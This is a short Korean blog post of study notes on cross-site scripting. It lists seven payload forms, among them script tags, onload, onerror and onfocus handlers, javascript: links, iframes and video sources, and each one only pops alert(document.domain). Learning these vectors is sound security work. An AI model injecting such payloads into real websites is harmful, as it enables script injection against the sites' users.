1.script EX) <script>alert("XSS공격성공");</script> 를입력하면 XSS공격성공이라고 써져있는 alert가 뜬다
2.onload EX) <img src="https://dreamhack.io/valid.jpg" onload="alert(document.domain)"> 를 입력하면 태그가 요청하는 데이터를 로드한후 웹페이지의 도메인이름을 띄어준다
3.onerror EX) <img src="valid.jpg" onerror="alert(document.domain)"> 를 입력하면 태그가 요청하는 데이터를 로드하는데 실패하면 웹페이지의 도메인이름을 띄워준다 즉 onload와 반대되는 태그이다onfocus EX) <input type="text" id="inputID" 4.onfocus="alert(document.domain)" autofocus> 를 입력하면 페이지가 로드가되고 autofocus속성때문에 자동으로 input창에 focus가 된다 focus가 되는순다 onfocus속성이 작동하면서 도메인주소를 출력한다
5.javascript: EX) <a href="javascript:alert(document.domain)">Click me!</a> 는 Click me!라는 태그를 누르면 javascript가 실행되어 뒤에있는 alert가 실행된다
6.iframe 이 태그는 해당 웹페이지안에 다른 html을 불러와서 삽입하는 태그이다
EX) <iframe src="javascript:alert(document.domain)">을 입력하면 자바스크립트가 실행되어 alert가 실행된다
7.video EX) <video><source onerror="alert(document.domain)"/></video>이 코드는 비디오를 재생할수없을때 alert를 띄워준다
'보안 > XSS' 카테고리의 다른 글
| CSP란? (0) | 2024.06.04 |
|---|---|
| 자바스크립트 필터링 우회하는방법 (0) | 2024.05.28 |
| XSS 우회하는 방법 모음 (0) | 2024.05.26 |